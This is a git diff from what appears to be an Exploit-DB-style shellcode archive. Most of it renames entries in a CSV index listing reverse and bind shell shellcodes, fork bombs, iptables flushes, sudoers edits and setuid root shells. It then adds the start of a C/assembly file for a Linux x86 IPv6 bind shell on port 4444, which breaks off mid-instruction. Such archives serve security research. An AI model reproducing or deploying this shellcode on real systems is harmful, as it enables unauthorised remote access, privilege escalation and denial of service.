Shifat",shellcode,windows_x86-64 +40981,shellcodes/windows_x86-64/40981.c,"Windows/x64 - Bind (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 41072,shellcodes/windows_x86-64/41072.c,"Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 41089,shellcodes/linux_x86-64/41089.c,"Linux/x64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64 -41128,shellcodes/linux_x86-64/41128.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64 +41128,shellcodes/linux_x86-64/41128.c,"Linux/x64 - Bind (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64 41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64 41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux -41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator -41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86 -41375,shellcodes/linux/41375.c,"Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux +41220,shellcodes/generator/41220.c,"Linux - Reverse (/TCP) Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator +41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86 +41375,shellcodes/linux/41375.c,"Linux - Bind (/TCP) Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux 41381,shellcodes/windows_x86/41381.c,"Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86 -41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64 +41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64 41403,shellcodes/linux_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,linux_x86 41439,shellcodes/linux_x86-64/41439.c,"Linux/x64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64 41467,shellcodes/windows_x86/41467.c,"Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86 -41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64 -41477,shellcodes/linux_x86-64/41477.c,"Linux/x64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64 -41481,shellcodes/windows_x86/41481.asm,"Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86 +41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x64 - Bind (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64 +41477,shellcodes/linux_x86-64/41477.c,"Linux/x64 - Reverse (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64 +41481,shellcodes/windows_x86/41481.asm,"Windows/x86 - Reverse (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86 41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64 41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64 41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64 41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64 41581,shellcodes/windows_x86/41581.c,"Windows/x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86 -43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86 +43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86 43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86 43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha 43481,shellcodes/alpha/43481.c,"Alpha - execve() Shellcode (112 bytes)",2009-01-01,anonymous,shellcode,alpha 43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha 43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86 43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86 -43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm +43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm 43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x64 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64 -43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64 +43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x64 - Bind (/TCP) Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64 43504,shellcodes/freebsd_x86/43504.asm,"FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)",2009-01-01,Tosh,shellcode,freebsd_x86 43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86 -43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86 +43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86 43507,shellcodes/freebsd_x86/43507.c,"FreeBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,zillion,shellcode,freebsd_x86 43508,shellcodes/irix/43508.c,"IRIX - execve(/bin/sh -c) Shellcode (72 bytes)",2009-01-01,anonymous,shellcode,irix 43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,shellcode,irix -43510,shellcodes/irix/43510.c,"IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix +43510,shellcodes/irix/43510.c,"IRIX - Bind (/TCP)Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix 43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,shellcode,irix 43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix 43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm @@ -811,62 +811,62 @@ id,file,description,date,author,type,platform 43532,shellcodes/arm/43532.c,"Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm 43533,shellcodes/arm/43533.c,"Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)",2013-09-04,gunslinger_,shellcode,arm 43534,shellcodes/arm/43534.c,"Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes)",2010-08-31,"Jonathan Salwan",shellcode,arm -43536,shellcodes/arm/43536.c,"Android/ARM - Reverse TCP (10.0.2.2:0x3412/TCP) Shell (/system/bin/sh) Shellcode (79 bytes)",2009-01-01,"Neil Klopfenstein",shellcode,arm +43536,shellcodes/arm/43536.c,"Android/ARM - Reverse (10.0.2.2:0x3412/TCP) Shell (/system/bin/sh) Shellcode (79 bytes)",2009-01-01,"Neil Klopfenstein",shellcode,arm 43537,shellcodes/arm/43537.c,"Linux/StrongARM - setuid() Shellcode (20 bytes)",2009-01-01,funkysh,shellcode,arm 43538,shellcodes/arm/43538.c,"Linux/StrongARM - execve(/bin/sh) Shellcode (47 bytes)",2009-01-01,funkysh,shellcode,arm -43539,shellcodes/arm/43539.c,"Linux/StrongARM - Bind TCP Shell (/bin/sh) Shellcode (203 bytes)",2009-01-01,funkysh,shellcode,arm +43539,shellcodes/arm/43539.c,"Linux/StrongARM - Bind (/TCP) Shell (/bin/sh) Shellcode (203 bytes)",2009-01-01,funkysh,shellcode,arm 43545,shellcodes/linux_sparc/43545.c,"Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes)",2009-01-01,anathema,shellcode,linux_sparc 43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4 -43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4 +43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4 43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc 43549,shellcodes/linux_x86-64/43549.c,"Linux/x64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64 43550,shellcodes/linux_x86-64/43550.c,"Linux/x64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64 43552,shellcodes/linux_x86-64/43552.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 43553,shellcodes/linux_x86-64/43553.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 -43554,shellcodes/linux_x86-64/43554.c,"Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64 +43554,shellcodes/linux_x86-64/43554.c,"Linux/x64 - Bind (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64 43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64 43556,shellcodes/linux_x86-64/43556.asm,"Linux/x64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 43557,shellcodes/linux_x86-64/43557.asm,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 -43558,shellcodes/linux_x86-64/43558.asm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64 -43559,shellcodes/linux_x86-64/43559.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64 +43558,shellcodes/linux_x86-64/43558.asm,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64 +43559,shellcodes/linux_x86-64/43559.asm,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64 43561,shellcodes/linux_x86-64/43561.asm,"Linux/x64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64 41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86 -41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86 +41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86 41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86 43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43910,shellcodes/linux_x86/43910.c,"Linux/x86 - Egghunter Shellcode (12 Bytes)",2018-01-28,"Nipun Jaswal",shellcode,linux_x86 -43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm -43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2017-11-09,0x4ndr3,shellcode,linux_x86-64 -43952,shellcodes/linux_x86-64/43952.nasm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)",2017-11-11,0x4ndr3,shellcode,linux_x86-64 +43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm +43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2017-11-09,0x4ndr3,shellcode,linux_x86-64 +43952,shellcodes/linux_x86-64/43952.nasm,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)",2017-11-11,0x4ndr3,shellcode,linux_x86-64 43953,shellcodes/linux_x86-64/43953.nasm,"Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)",2017-11-23,0x4ndr3,shellcode,linux_x86-64 43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64 43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator 43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64 -44143,shellcodes/arm/44143.s,"Linux/ARM - Bind TCP (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm -42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 -41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86 +44143,shellcodes/arm/44143.s,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm +42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 +41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86 41750,shellcodes/linux_x86-64/41750.asm,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64 41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)",2017-03-29,WangYihang,shellcode,linux_x86 41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64 41883,shellcodes/linux_x86-64/41883.txt,"Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64 41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86 41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86 -41970,shellcodes/linux_x86-64/41970.asm,"Linux/x64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64 +41970,shellcodes/linux_x86-64/41970.asm,"Linux/x64 - Reverse (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64 42016,shellcodes/windows/42016.asm,"Windows - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows 42126,shellcodes/linux_x86-64/42126.c,"Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64 42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86 42179,shellcodes/linux_x86-64/42179.c,"Linux/x64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64 -42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86 -42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86 -42339,shellcodes/linux_x86-64/42339.c,"Linux/x64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64 +42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86 +42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86 +42339,shellcodes/linux_x86-64/42339.c,"Linux/x64 - Reverse (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64 42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86 -42485,shellcodes/linux_x86-64/42485.c,"Linux/x64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64 +42485,shellcodes/linux_x86-64/42485.c,"Linux/x64 - Reverse (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64 42522,shellcodes/linux_x86-64/42522.c,"Linux/x64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64 42523,shellcodes/linux_x86-64/42523.c,"Linux/x64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64 42594,shellcodes/linux_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,linux_x86 -42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm -42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm +42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm +42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm 42791,shellcodes/linux_x86-64/42791.c,"Linux/x64 - mkdir(evil) Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64 42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86 42992,shellcodes/windows_x86-64/42992.c,"Windows/x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 @@ -874,13 +874,14 @@ id,file,description,date,author,type,platform 44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86 44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86 44445,shellcodes/generator/44445.py,"Linux/x64 - x64 Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator -44505,shellcodes/linux_x86/44505.c,"Linux/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86 +44505,shellcodes/linux_x86/44505.c,"Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86 44507,shellcodes/linux_x86/44507.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access + Null-Free Shellcode (79 bytes)",2018-04-24,absolomb,shellcode,linux_x86 -44508,shellcodes/linux_x86/44508.c,"Linux/x86 - Reverse TCP (127.1.1.1:5555/TCP) Shell Shellcode (73 Bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86 +44508,shellcodes/linux_x86/44508.c,"Linux/x86 - Reverse (127.1.1.1:5555/TCP) Shell Shellcode (73 Bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86 44509,shellcodes/linux_x86/44509.c,"Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)",2018-04-24,absolomb,shellcode,linux_x86 44510,shellcodes/linux_x86/44510.c,"Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86 44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86 44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86 -44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86 +44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86 44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86 -44620,shellcodes/linux_x86/44620.c,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (96 Bytes)",2018-05-14,"Paolo Perego",shellcode,linux_x86 +44620,shellcodes/linux_x86/44620.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (96 Bytes)",2018-05-14,"Paolo Perego",shellcode,linux_x86 +44723,shellcodes/linux_x86/44723.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)",2018-05-23,"Matteo Malvica",shellcode,linux_x86 diff --git a/shellcodes/linux_x86/44723.c b/shellcodes/linux_x86/44723.c new file mode 100644 index 000000000..3442d82c6 --- /dev/null +++ b/shellcodes/linux_x86/44723.c @@ -0,0 +1,112 @@ +// # Title: Linux/x86 - IPv6 TCP bind tcp shell on 4444 port +// # Length : 113 bytes +// # Author : Matteo Malvica +// # Tested On : kali linux 4.15 +// # Contact : matteo@malvica.com +// # Description: it creates an IPv6 socket on localhost ::1 and listens on port 4444 + +/* + +global _start +section .text + +_start: + +;; ipv6 socket creation +push 0x6 ; protocol IPv6 +push 0x1 ; socket_type=SOCK_STREAM (0x1) +push 0xa ; AF_INET6 +xor eax,eax ; zero out eax +xor ebx,ebx ; zero out ebx +mov al,0x66 ; syscall: sys_socketcall + cleanup eax register +inc ebx ; 1 = SYS_socket +mov ecx,esp ; save pointer (ESP) to socket() args (ECX) +int 0x80 +mov esi,eax ; saves socket descriptor +xor eax,eax + +;;bind +push DWORD eax ;ipv6 loopback pushed as x4 dword +push DWORD eax +push DWORD eax +push DWORD eax +push DWORD eax ;sin6_addr +push WORD 0x5c11 ;port 4444 +push WORD 